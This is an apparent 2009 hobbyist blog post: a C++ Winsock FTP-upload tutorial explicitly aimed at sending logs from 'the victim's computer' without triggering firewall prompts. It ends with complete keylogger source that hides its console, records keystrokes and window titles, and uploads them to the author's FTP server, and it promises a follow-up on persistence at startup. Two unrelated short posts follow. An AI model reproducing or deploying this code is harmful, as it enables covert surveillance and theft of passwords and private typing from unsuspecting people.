Friday, May 29, 2009

C++ - FTP Uploading through winsock (bypasses firewalls!)

Firstly, I want to thank all of you that subscribed, and any of you that haven't:
SUBSCRIBE, the link is to your right!


Anyway, I know it's been a long time since my last post, but with good cause! I have finally put together a way for you to upload your logs to an FTP server that works through the firewall on the victim's computer. The trick is simply that the program only ever makes outbound connections (the control connection to port 21 and a passive-mode data connection), and a default host firewall allows outbound traffic while blocking unsolicited inbound connections. It is not invisible: anything that filters outbound traffic, proxies FTP, or watches the network sees the whole session in plaintext, username and password included.

Also, know that this post stands on its own from the other keylogger tutorials, but if you want to use this code in those loggers, I suggest you read them too.

So let's get started with this tutorial. Firstly, what is FTP?
Well, FTP is short for File Transfer Protocol. It is an application-layer protocol that runs over TCP (not UDP) and is used for transferring files. If you want more information about the history of the protocol, I strongly suggest you read en.wikipedia.org/wiki/FTP

Anyway, moving on, how does FTP work? Well, FTP defines a specific connection between a client and a server, and the specific commands and replies that are sent between them.
In order to make this program I had to read through the FTP RFC, the specification written by the protocol's designers. Google "RFC 959" for more information. Anyway, the basics are that the client has to talk to the server in a very distinct way. I've laid it out below in normal language and then in FTP command language.

CHATROOM FTPSUCKSJUSTKIDDING OPENED
Client connects to server
Client: Here is my username.
Server: Oh, nice username, okay the username has been set, enter your password.
Client: K, here's my password.
Server: Good job, that's the right password, you are now connected OR you phail, that's the wrong password.
Assuming the password is correct.....
Client: Okay, so now I'm going to send you a file as raw bytes (FTP calls this "image" type), which is what you want for an .exe or a .txt, okay?
Server: Okay, connect to me on (000,00,000,000,10,4)
Client: Okay, I'll connect to you on IP 000.00.000.000 on port 2564 because 10*256+4 is 2564
Client: Okay, now I'm going to send some data and I need you to store it as data.txt in the /data folder
Server2: -_-
Client opens second connection to Server2
Client sends data
Client: Okay, we are done, I'm going to go now, bye!
Client leaves the chatroom

Enough of that childish stuff ;], now for some real commands. Notice how much shorter they are, and notice that the server never checks the integrity of the file: FTP has no checksum, and everything, including the password, goes over the wire in plaintext.

Client connects to server
Server: 220 (welcome banner, sometimes several lines)
Client: "USER username\r\n"
Server: 331 User name okay, need password.
Client: "PASS password\r\n"
Server: 230 User logged in, proceed. (or 530 Login incorrect.)
Client: "TYPE I\r\n"
Server: 200 Type set to I. (binary, aka image)
Client: "PASV\r\n"
Server: 227 Entering Passive Mode (100,10,100,100,10,4)
Client opens a new connection to the server on port 10*256+4 = 2564
Client: "STOR data.txt\r\n"
Server: 150 Ok to send data.
Client sends the data on the new connection, then closes it
Server: 226 Transfer complete.
Client: "QUIT\r\n"
Server: 221 Goodbye.

The wording of the replies varies from server to server; the three-digit code at the start of each one is what you check.


Note the different messages that the server sends back, we will use them in error checking.

So, all we have to do for our upload feature is send data in this format to the server and have it save it. The firewall never prompts because both connections are outbound and, in passive mode, the client never has to accept a connection from the server. That is the whole trick; a firewall that filters outbound traffic is a different matter, and we will get into that later.

Anyway, I bet many of you are like whoa there, slow down. How do I get an FTP server? Well, the easiest way for you noobs (just kidding) would be to get one from the free web hosting site tripod.com. The name of your FTP server will be ftp.tripod.com, your username will be your username, and your password will be the password that you set! Remember that FTP sends both of those in plaintext, so do not reuse a password you care about.

You will also need some way to access your FTP server. I suggest that you download FireFTP or FileZilla to manage your server, so that you can see if the following code works!

Simple right?

So anyway, after that's done, let's create a small test file in our C:\ folder that we can upload, and just for compatibility let's name it test.txt. Open the text file and paste in whatever you want, but make sure the file has something in it. (On Vista and later, creating a file in the root of C:\ needs administrator rights, so either run your editor as administrator or pick another folder and change the path in the code.)

Okay, now we are ready to start coding, almost! For this program we will be using sockets to send our file because thats the only way to send it without alerting the firewall. If you guys are not worried about firewalls, I would suggest you just use the wininet library for FTP which makes life much easier but more painful when you realize your files arent getting sent.

A good source for help with the wininet functions is here and for specific functions use the same page just navigate to the wininet functions tab or just click on the links. Comment if you need any help and I can send you the wininet code!

Well, we want to do it the boss way, so we will learn Winsock, or actually Winsock 2.
Winsock is the set of Windows APIs for socket programming. A socket is one end of a connection. I really suggest that you know some Winsock before coming in; either buy a book or read a tutorial
like this one http://www.madwizard.org/programming/tutorials/netcpp/.

In addition, before we start coding, we have to link against Winsock. For those of you using Dev-C++ it's Project Options, then the Parameters tab, and in the Linker box add -lws2_32, which links you against ws2_32.dll, the Winsock 2 library!

Okay, now let's first make some base functions that we will need. I'm going to keep this long and tedious because I know a lot of you cannot object-orient your programs, which means that I won't either; if you want an object-oriented approach to this simple program, just email me.

In addition, also add these in your header if they arent there already:

#include <winsock2.h> //must come before windows.h, otherwise windows.h pulls in the old winsock.h
#include <windows.h>
#include <string>
#include <sstream>
#include <iostream>
#include <fstream>
#include <cstdio>
#include <cstdlib>
#include <cstring>




Anyway, moving on, remember that the server sends us back the address to connect to? Well, it sends it as text: six decimal numbers separated by commas, the four bytes of the IP address followed by the two bytes of the port. Yes, I know we are getting a little ahead of ourselves, but we have to create a function that can change the separated strings into integers. For that we use iostreams, specifically an istringstream.

Here is the function. I won't go into explaining it because you can look it up on the web and we have a lot to cover. Furthermore, it's pretty self-explanatory.


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}


One thing that you should note, though, is the way we were able to modify the parameter within the function. This is due to passing by reference (the & on int &i), a close cousin of pointers, and you should learn about both if you don't know them already.
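Here is the whole 227 reply taken apart properly, as an added example that is not part of the original post. It is plain C++ with no Winsock in it, so it compiles and runs anywhere, and the reply strings in it are constructed samples, not captures from tripod or any other server. The names parsePasvReply, ftpReplyCode, pasvReplyIsValid and PasvTarget are my own. It goes beyond stringtoint: it checks the reply code first, follows RFC 1123's advice to look for the first digit rather than trusting that the server used parentheses, refuses any of the six fields that does not fit in a byte, and hands back the address as well as the port.

```cpp
#include <cctype>
#include <cstdio>
#include <cstdlib>
#include <stdexcept>
#include <string>

// Where the data connection has to go, as taken from a 227 reply.
struct PasvTarget {
    std::string host;   // dotted quad, e.g. "209.202.252.54"
    int port;           // p1 * 256 + p2
};

// Returns the three-digit code that starts every FTP reply line, or -1 if the
// line does not begin with three digits.
int ftpReplyCode(const std::string &line) {
    if (line.size() < 3) return -1;
    for (int i = 0; i < 3; ++i)
        if (!std::isdigit(static_cast<unsigned char>(line[i]))) return -1;
    return std::atoi(line.substr(0, 3).c_str());
}

// Parses "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)." (RFC 959 section 4.2).
// RFC 1123 section 4.1.2.6 says a client must not rely on the parentheses, so the
// code scans for the first digit after the reply code instead of searching for "(".
// Throws std::runtime_error on anything that is not a usable 227 reply.
PasvTarget parsePasvReply(const std::string &reply) {
    if (ftpReplyCode(reply) != 227)
        throw std::runtime_error("not a 227 reply: " + reply);

    std::string::size_type i = 3;
    while (i < reply.size() && !std::isdigit(static_cast<unsigned char>(reply[i])))
        ++i;
    if (i == reply.size())
        throw std::runtime_error("227 reply carries no address: " + reply);

    unsigned v[6];
    if (std::sscanf(reply.c_str() + i, "%u,%u,%u,%u,%u,%u",
                    &v[0], &v[1], &v[2], &v[3], &v[4], &v[5]) != 6)
        throw std::runtime_error("227 reply is not h1,h2,h3,h4,p1,p2: " + reply);

    // Every field is one byte; a value above 255 is a malformed (or hostile) reply.
    for (int k = 0; k < 6; ++k)
        if (v[k] > 255)
            throw std::runtime_error("227 reply field out of range: " + reply);

    PasvTarget t;
    char host[16];
    std::snprintf(host, sizeof host, "%u.%u.%u.%u", v[0], v[1], v[2], v[3]);
    t.host = host;
    t.port = static_cast<int>(v[4] * 256 + v[5]);
    if (t.port == 0)
        throw std::runtime_error("227 reply names port 0: " + reply);
    return t;
}

// Yes/no wrapper for callers that do not want to deal with the exception.
bool pasvReplyIsValid(const std::string &reply) {
    try { parsePasvReply(reply); return true; }
    catch (const std::runtime_error &) { return false; }
}

int main() {
    // Constructed sample replies, not captured from a real server.
    PasvTarget t = parsePasvReply("227 Entering Passive Mode (209,202,252,54,10,4).\r\n");
    std::printf("connect the data socket to %s:%d\n", t.host.c_str(), t.port);
    std::printf("port byte 300 rejected: %s\n",
                pasvReplyIsValid("227 Entering Passive Mode (1,2,3,4,300,1)\r\n") ? "no" : "yes");
    return 0;
}
```

Notice that the address in the 227 reply is chosen by the server, and a client should not blindly connect to whatever address it is told. The code later in this post does the safer thing by ignoring that part and reusing the server address it already knows; the parser returns it anyway so a cautious client can compare the two and refuse to continue when they differ.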

Moving on, now comes the main part. If you read that Winsock tutorial you should be able to follow along. I am going to give you the code first and then explain it after; don't worry if you have any questions, and remember, if I leave anything unexplained, don't be afraid to comment and ask about it.

Also note that I have done only minimal error checking, so you'd better hope it works ;]. It should, but it's always good to check every reply code the server sends back, and I want you, the reader, to have a shot at it. Be sure to send me your implementation and I will publish it alongside mine in the next post, or maybe the one after that.



#include <winsock2.h>
#include <windows.h>
#include <string>
#include <sstream>
#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <cstring>

using namespace std;

const char *FTP_SERVER_IP = "209.202.252.54"; //the tripod ftp server address. Change it if you arent using tripod.

void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

//Reads one reply from the server and NUL-terminates it (recv does not do that for you, and
//handing a non-terminated buffer to std::string is undefined behaviour).
//Returns the number of bytes read, or -1 if the connection failed or was closed.
int readReply(SOCKET s, char *buf, int bufsize){
int n = recv(s, buf, bufsize - 1, 0);
if(n <= 0) return -1;
buf[n] = '\0';
return n;
}

//True if the reply starts with the given three digit code, for example "331".
bool replyIs(const char *reply, const char *code){
return strncmp(reply, code, 3) == 0;
}

bool sendLogIn(SOCKET _LSoc){
string userbuffer = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
string passbuffer = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
string username = "USER " + userbuffer + "\r\n"; //std::string grows as needed; a strcat into a
string password = "PASS " + passbuffer + "\r\n"; //six byte char array would overflow it
char servermessage[1000];

send(_LSoc, username.c_str(), (int)username.size(), 0);
if(readReply(_LSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "331"))
return false; //331 = username ok, now send the password

send(_LSoc, password.c_str(), (int)password.size(), 0);
if(readReply(_LSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "230"))
return false; //230 = logged in, anything else (530) means the login was refused
return true;
}

//Switches to binary mode and asks for passive mode. Returns the data port from the 227 reply, or -1.
int sendConnInfo(SOCKET _CSoc){
char servermessage[1000];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
if(readReply(_CSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "200"))
return -1;

send(_CSoc, "PASV\r\n", 6, 0);
if(readReply(_CSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "227"))
return -1;

//227 Entering Passive Mode (h1,h2,h3,h4,p1,p2). Skipping a fixed number of characters after
//"Mode" only works for one particular address length, so walk the commas instead.
message = servermessage;
position = message.find("(");
if(position == string::npos) return -1;
portbuffer = message.substr(position + 1);
for(int i = 0; i < 4; i++){ //step over h1..h4, we already know the server address
position = portbuffer.find(",");
if(position == string::npos) return -1;
portbuffer = portbuffer.substr(position + 1);
}

position = portbuffer.find(",");
position2 = portbuffer.find(")");
if(position == string::npos) return -1;

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position + 1, position2 - position - 1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

if(portbuf < 0 || portbuf > 255 || _portbuf < 0 || _portbuf > 255) return -1; //each is one byte

port = portbuf*256;
port = port + _portbuf;
return port;
}

//Issues STOR on the control connection. Whatever we send on the data connection ends up in test.txt.
bool sendFileRequest(SOCKET _FSoc){
char servermessage[1000];
send(_FSoc, "STOR test.txt\r\n", (int)strlen("STOR test.txt\r\n"), 0);
if(readReply(_FSoc, servermessage, sizeof(servermessage)) < 0)
return false;
return replyIs(servermessage, "150") || replyIs(servermessage, "125"); //server is ready for the data
}

//Opens the data connection on the port sendConnInfo returned, sends the STOR request and
//streams the file. Closing the data socket is what tells the server the file is complete.
BOOL ftpSocket(SOCKET ctrl, int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[1000];
HANDLE HFile;
DWORD read;
char buffer[4096];
char filename[] = "C:\\test.txt";
int connectionerror2;
int trycount2 = 2;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
return FALSE;
}

memset(&pasvserver, 0, sizeof(pasvserver));
pasvserver.sin_family = AF_INET;
pasvserver.sin_port = htons((u_short)port); //htons converts the port to network byte order for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr(FTP_SERVER_IP); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 == 10){ //"==": a single "=" here assigns 10 and is always true
closesocket(sock);
return FALSE;
}
}

if(!sendFileRequest(ctrl)){
closesocket(sock);
return FALSE;
}

HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(HFile == INVALID_HANDLE_VALUE){
closesocket(sock);
return FALSE;
}

while(ReadFile(HFile, buffer, sizeof(buffer), &read, NULL) && read > 0){
send(sock, buffer, (int)read, 0);
}

CloseHandle(HFile);
closesocket(sock); //EOF on the data connection = end of file, the server now writes it out
readReply(ctrl, servermessage, sizeof(servermessage)); //226 Transfer complete
return TRUE;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[1000];
int port;

if(WSAStartup(MAKEWORD(2,2), &WData) != 0)
return 0;
FSoc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(21); //the control connection always goes to port 21
server.sin_addr.s_addr = inet_addr(FTP_SERVER_IP); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount == 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

readReply(FSoc, servermessage, sizeof(servermessage)); //220 welcome banner, read it so that it does not
//get mixed up with the reply to USER

if(sendLogIn(FSoc)){
port = sendConnInfo(FSoc);
if(port > 0)
ftpSocket(FSoc, port);
}
send(FSoc, "QUIT\r\n", 6, 0); //the server answers 221 and closes the connection
closesocket(FSoc);
WSACleanup();
return 0;
}

int main(){
return sendFile();
}



OMG OMG OMG OMG OMG OMG WHAT IS THAT!

Yes, I know what's going through your mind, but it's really not that complicated. Before I start explaining, make sure you read the server-client conversation above once more. So let's start with sendFile, our entry point: basically we initialize a new Winsock session with WSAStartup. We then create a socket in that session. Then we use the SOCKADDR_IN structure to fill in the very important connection information (the address family, port 21 in network byte order, and the server's IP address) and connect to the server!

What's the while loop next, you may ask? Well, it's just to make sure that our program doesn't spend forever attempting to connect to the server and that it gives up after a few tries =). Watch the comparison in it: it has to be `trycount == 10`. A single `=` there assigns 10 to trycount and is always true, so the program would give up after the first failed attempt.

Okay, so then we have some function calls. Also note that you must read the server's reply after every command; otherwise the replies pile up in the socket and the next recv() hands you the reply to an earlier command (you would see this if you error checked). Sleeping for a second before recv() only makes it likely that the whole reply has arrived. TCP is a byte stream with no message boundaries, so a reply can still arrive in pieces or glued to the next one, and a proper client keeps reading until it sees the line that ends the reply.
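What "reading until the reply is complete" looks like, as an added example that is not from the original post. The socket here is a stand-in object (FakeSocket, my own name) that feeds a constructed transcript a few bytes at a time, so the code runs offline without Winsock; swap its recv() for the real one and readReply works on a control connection. It handles the two things a Sleep(1000) cannot: a reply split across several recv() calls, and a multi-line reply such as a three-line welcome banner (RFC 959 section 4.2).

```cpp
#include <cctype>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

// Stand-in for a connected socket. It hands out at most `chunk` bytes per call, which is
// exactly what a real recv() may do: a reply can arrive in pieces or together with the
// next one. The bytes it serves are a constructed sample, not a capture from a real server.
struct FakeSocket {
    std::string data;
    std::size_t pos;
    std::size_t chunk;
    FakeSocket(const std::string &d, std::size_t c) : data(d), pos(0), chunk(c) {}
    int recv(char *buf, int len) {                   // returns 0 at end of stream, like recv()
        std::size_t n = data.size() - pos;
        if (n > chunk) n = chunk;
        if (n > static_cast<std::size_t>(len)) n = static_cast<std::size_t>(len);
        std::memcpy(buf, data.data() + pos, n);
        pos += n;
        return static_cast<int>(n);
    }
};

static bool startsWithCode(const std::string &line) {
    return line.size() >= 3 && std::isdigit(static_cast<unsigned char>(line[0]))
        && std::isdigit(static_cast<unsigned char>(line[1]))
        && std::isdigit(static_cast<unsigned char>(line[2]));
}

// Reads one complete FTP reply: either a single line "ddd text\r\n", or a multi-line reply
// that starts "ddd-text" and ends with a line "ddd text" carrying the same code. Bytes that
// belong to the *next* reply stay in `pending`, so nothing is lost between calls.
// Returns the reply code, or -1 if the stream ends first or the line is not an FTP reply.
template <class Sock>
int readReply(Sock &sock, std::string &pending, std::string &reply) {
    reply.clear();
    int code = -1;
    for (;;) {
        std::string::size_type eol;
        while ((eol = pending.find("\r\n")) == std::string::npos) {   // need a full line
            char buf[64];
            int n = sock.recv(buf, sizeof buf);
            if (n <= 0) return -1;
            pending.append(buf, static_cast<std::size_t>(n));
        }
        std::string line = pending.substr(0, eol + 2);
        pending.erase(0, eol + 2);
        reply += line;

        if (code == -1) {                                   // first line of the reply
            if (!startsWithCode(line)) return -1;
            code = std::atoi(line.substr(0, 3).c_str());
            if (line.size() < 4 || line[3] != '-') return code;   // single-line reply: done
        } else if (startsWithCode(line) && line.compare(0, 3, reply, 0, 3) == 0
                   && line.size() >= 4 && line[3] == ' ') {
            return code;                                    // closing line of a multi-line reply
        }
    }
}

typedef std::vector<std::pair<int, std::string> > ReplyList;

// Drains a transcript through readReply() `chunk` bytes at a time and returns every
// (code, text) pair it produced; the last entry is (-1, "") once the stream is exhausted.
ReplyList repliesOf(const std::string &transcript, std::size_t chunk) {
    FakeSocket sock(transcript, chunk);
    std::string pending, reply;
    ReplyList out;
    for (;;) {
        int code = readReply(sock, pending, reply);
        out.push_back(std::make_pair(code, reply));
        if (code == -1) break;
    }
    return out;
}

// Constructed sample: a three-line greeting followed by the reply to USER.
const std::string SAMPLE_TRANSCRIPT =
    "220-Welcome to the sample server.\r\n"
    "220-Mind the gap.\r\n"
    "220 Ready.\r\n"
    "331 User name okay, need password.\r\n";

int main() {
    ReplyList replies = repliesOf(SAMPLE_TRANSCRIPT, 7);   // 7 bytes per recv() on purpose
    for (std::size_t i = 0; i < replies.size(); ++i)
        std::printf("reply code %d (%u bytes of text)\n", replies[i].first,
                    static_cast<unsigned>(replies[i].second.size()));
    return 0;
}
```

The `pending` string is the important part: whatever arrived after the end of the current reply belongs to the next one and has to be kept, which is exactly what one recv() per reply throws away.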

Moving on, now that we are connected we have our first function call, sendLogIn, which sends the username and the password over the connection specified by the socket handle FSoc and looks for the 331 and 230 replies. Note that in sendLogIn and all the other functions, every command is sent in that specific format, terminated by \r\n. You have to change the values of the first two variables in sendLogIn to specify your username and password! Please don't comment about that.

Okay, next we have sendConnInfo, which sends TYPE I and PASV and uses the string conversion on the 227 reply to return the port for the data connection.

Okay, next we have sendFileRequest, which issues a STOR request on the control connection telling the server to store whatever comes in on the data connection as test.txt in the default folder.

So ftpSocket() is basically the same as sendFile, except that it connects to the server on the different port which sendConnInfo parsed and returned. It then streams the file over that connection and closes it. Closing the data connection is how the server learns that the file is complete; it answers 226 on the control connection, and it stores the file, AND IT DOES.

Now fire up FireFTP and see if it worked!

In the end we close the control connection, issue WSACleanup(), and then we end our program!

Well, that was awesome right! How about we put it into our keylogger.

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesn't compile or work, because it should.

Tune in next time for instructions on how to make this keylogger run every time the user starts up their machine!

WARNING:
MESSY CODE BELOW ;]
-----------------------------------------------------------------------------------

#include <winsock2.h>
#include <windows.h>
#include <string>
#include <sstream>
#include <iostream>
#include <fstream>
#include <cstdio>
#include <cstdlib>
#include <cstring>

using namespace std;

const char *FTP_SERVER_IP = "209.202.252.54"; //the tripod ftp server address. Change it if you arent using tripod.

void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

//Reads one reply from the server and NUL-terminates it (recv does not do that for you).
//Returns the number of bytes read, or -1 if the connection failed or was closed.
int readReply(SOCKET s, char *buf, int bufsize){
int n = recv(s, buf, bufsize - 1, 0);
if(n <= 0) return -1;
buf[n] = '\0';
return n;
}

//True if the reply starts with the given three digit code, for example "331".
bool replyIs(const char *reply, const char *code){
return strncmp(reply, code, 3) == 0;
}

bool sendLogIn(SOCKET _LSoc){
string userbuffer = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
string passbuffer = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
string username = "USER " + userbuffer + "\r\n"; //std::string grows as needed; a strcat into a
string password = "PASS " + passbuffer + "\r\n"; //six byte char array would overflow it
char servermessage[1000];

send(_LSoc, username.c_str(), (int)username.size(), 0);
if(readReply(_LSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "331"))
return false; //331 = username ok, now send the password

send(_LSoc, password.c_str(), (int)password.size(), 0);
if(readReply(_LSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "230"))
return false; //230 = logged in, anything else (530) means the login was refused
return true;
}

//Switches to binary mode and asks for passive mode. Returns the data port from the 227 reply, or -1.
int sendConnInfo(SOCKET _CSoc){
char servermessage[1000];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
if(readReply(_CSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "200"))
return -1;

send(_CSoc, "PASV\r\n", 6, 0);
if(readReply(_CSoc, servermessage, sizeof(servermessage)) < 0 || !replyIs(servermessage, "227"))
return -1;

//227 Entering Passive Mode (h1,h2,h3,h4,p1,p2). Walk the commas rather than skipping a fixed
//number of characters, which only works for one particular address length.
message = servermessage;
position = message.find("(");
if(position == string::npos) return -1;
portbuffer = message.substr(position + 1);
for(int i = 0; i < 4; i++){ //step over h1..h4, we already know the server address
position = portbuffer.find(",");
if(position == string::npos) return -1;
portbuffer = portbuffer.substr(position + 1);
}

position = portbuffer.find(",");
position2 = portbuffer.find(")");
if(position == string::npos) return -1;

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position + 1, position2 - position - 1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

if(portbuf < 0 || portbuf > 255 || _portbuf < 0 || _portbuf > 255) return -1; //each is one byte

port = portbuf*256;
port = port + _portbuf;
return port;
}

//Issues STOR on the control connection. Whatever we send on the data connection ends up in storekey.txt.
bool sendFileRequest(SOCKET _FSoc){
char servermessage[1000];
send(_FSoc, "STOR storekey.txt\r\n", (int)strlen("STOR storekey.txt\r\n"), 0);
if(readReply(_FSoc, servermessage, sizeof(servermessage)) < 0)
return false;
return replyIs(servermessage, "150") || replyIs(servermessage, "125"); //server is ready for the data
}

//Opens the data connection on the port sendConnInfo returned, sends the STOR request and
//streams the file. Closing the data socket is what tells the server the file is complete.
BOOL ftpSocket(SOCKET ctrl, int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[1000];
HANDLE HFile;
DWORD read;
char buffer[4096];
char filename[] = "C:\\storekey.txt";
int connectionerror2;
int trycount2 = 2;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
return FALSE;
}

memset(&pasvserver, 0, sizeof(pasvserver));
pasvserver.sin_family = AF_INET;
pasvserver.sin_port = htons((u_short)port); //htons converts the port to network byte order for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr(FTP_SERVER_IP); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 == 10){ //"==": a single "=" here assigns 10 and is always true
closesocket(sock);
return FALSE;
}
}

if(!sendFileRequest(ctrl)){
closesocket(sock);
return FALSE;
}

HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if(HFile == INVALID_HANDLE_VALUE){
closesocket(sock);
return FALSE;
}

while(ReadFile(HFile, buffer, sizeof(buffer), &read, NULL) && read > 0){
send(sock, buffer, (int)read, 0);
}

CloseHandle(HFile);
closesocket(sock); //EOF on the data connection = end of file, the server now writes it out
readReply(ctrl, servermessage, sizeof(servermessage)); //226 Transfer complete
return TRUE;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[1000];
int port;

if(WSAStartup(MAKEWORD(2,2), &WData) != 0)
return 0;
FSoc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

memset(&server, 0, sizeof(server));
server.sin_family = AF_INET;
server.sin_port = htons(21); //the control connection always goes to port 21
server.sin_addr.s_addr = inet_addr(FTP_SERVER_IP); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount == 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

readReply(FSoc, servermessage, sizeof(servermessage)); //220 welcome banner, read it so that it does not
//get mixed up with the reply to USER

if(sendLogIn(FSoc)){
port = sendConnInfo(FSoc);
if(port > 0)
ftpSocket(FSoc, port);
}
send(FSoc, "QUIT\r\n", 6, 0); //the server answers 221 and closes the connection
closesocket(FSoc);
WSACleanup();
return 0;
}


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON && key != VK_RBUTTON) //"&&": with "||" the condition is always true
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}

void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close();
}

void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key) & 1) //"== 1" binds tighter than "&", so the original only worked by accident
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close();
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}

int main(){
sendFile();
Logger();
return 1;
}

---------------------------------------------------------------------------------

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesn't compile or work, because it should.

Tune in next time for instructions on how to make this keylogger run every time the user starts up their machine!

www.riseagainstpoverty.org

So, a couple friends and I are starting this non profit organization. We just need to file a few more forms.


you can see what we have so far here
www.riseagainstpoverty.org

and for the blog of the site

www.riseagainstpoverty.org/blog

I REALLY REALLY URGE U GUYS TO HELP OUT BY SENDING THE link to like one other friend

and spreading the word

we have a lot of projects planned out so i hope you guys support us

thanks

Tuesday, May 12, 2009

Holocaust Denial Groups - The Double Wrong

Recently, CNN, CNET, and a lot of other news websites posted a story on how Facebook, after the constant appeals of its members, deleted two Holocaust denial groups. Is Holocaust denial wrong? Yes. But is deleting groups on the request of other members wrong? Yes.

